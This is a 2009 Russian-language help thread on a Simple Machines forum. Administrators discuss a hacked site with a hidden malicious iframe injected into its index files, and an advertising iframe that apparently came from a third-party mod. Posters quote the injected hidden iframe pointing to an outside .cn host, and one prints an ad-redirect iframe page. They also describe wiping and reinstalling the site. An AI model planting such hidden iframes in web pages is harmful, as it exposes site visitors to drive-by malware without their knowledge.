Взломали сайт и добавили фрейм

Xuga · 15 июня 2009, 12:01:36

Добрый день.
Ситуация следующая на сайт была атака в результате которой во всех файлах index был прописан вредоносный кодик.
Я смог удалить все за исключением небольшого фрейма http://forum.worldofjapan.ru/
Откройте страничку и взгляните, шаблон съехал вниз из-за
<iframe width="182" height="199" style="visibility: hidden;" src="http://cubanbigtop.cn:8080/index.php"/>

Подскажите как эту гадость удалить. Я никак не могу найти строчку за нее отвечающую.
ЗАРАНЕЕ ОГРОМНОЕС ПАСИБ!О

vladok · 15 июня 2009, 12:20:55

И не откроем -

нам ищщо вируса на компе не хватало

))

Ок.

http://www.simplemachines.ru/index.php/topic,6913.0.html

и общий поиск по форуму на iframe поможет отцу интернет демократии

Xuga · 15 июня 2009, 12:32:02

Вся проблема заключается в том, что я так и сделал но никакого эффекта ((((

Xuga · 15 июня 2009, 12:47:14

я просто взял и перезалил с дистрибутива все что тока мона.
моды слетели, но фрейм остался. В самом верху сайта.....
есть еще варианты как лечить?

Xuga · 15 июня 2009, 13:11:33

Решил воспользоваться методом "Топора".
1. Сохранил файл Сеттингс.пхп
2. Сохраняем папочки: attachments и avatars (обязательно замените в них все файлы index.php на те, что в дистрибутиве)
2. Удалил все папки и файлы с вебсервера
3. Перезалил все из дистрибутива
4. Удалил файл инстал.пхп и сеттингс.пхп
5. Перезалил сохраненный в пункте (1) файл Сеттингс.пхп
6. Заливаем папочки из пункта (2) не забывайте про index.php
7. Если у Вас отображается кракозябра смените темы (проблема в кодировке)

Финита ля комедия....
А ну и модули переустановите

Спасибо всем за помошь!!!!!!!!!!
Пожалуйста закройте тему.

vladok · 15 июня 2009, 15:02:34

Комп вылечи и пассы на фтп смени... а то все повторится.

Макар · 07 ноября 2009, 22:39:29

Сижу себе спокойно удаляю моды , на тестовой версии форума (расположена в папке основного форума)
и тут после удаления очередного пакета модификации в админке вылазит
в шапке фрейм с рекламой айфона
в приваси полис ссылка redirectportal.azoogleads.com/?affil=20140-smfhacks&traffic_type_id=3&t=mobile&offer_id=7254#

в прикрепленных файлах скрин и архив с исходным кодом страницы и самой страницей сохраненной их оперы

vladok · 07 ноября 2009, 23:28:59

Эо тебе имхо так автор мода с smfhacks.com "наказал". За что то там... за галерею Про что ли

См самый верх кода транички- айфрейм там.
ИМХО не вирус а открутка рекламы.

vladok · 07 ноября 2009, 23:31:44

И ведет он через smfhacks.com на... сек...

Код Выделить

<html>
<title>10 complimentary tones!</title>
<body>
<iframe src="http://x.azjmp.com/0KzPd?sub=smfhacks" frameborder="0" scrolling="No" height="850" width="100%"></iframe>
</body>
</html>

vladok · 07 ноября 2009, 23:42:14

Поймай vbgamer45-а ( http://custom.simplemachines.org/mods/index.php?action=profile;u=24876 ) на СМФ форуме или на его smfhacks.com и спроси что за фигня

Макар · 07 ноября 2009, 23:50:24

Ага, уже проконсультировался. Никаких галерей у меня нет . . .
вероятнее всего открутка баннеров разработчиками модов. От них стояло вроде два или три шутки. Ну да и бог с ними, на то и тестовая версия что бы вот такое вылавливать. Однох . . . хотел тест версию пере установить в целях тренировки и т.д. и т.п.

RBW · 26 декабря 2009, 14:00:19

Вот пакостники....
Надо обязательно на сайте делать "report as unsafe mod"..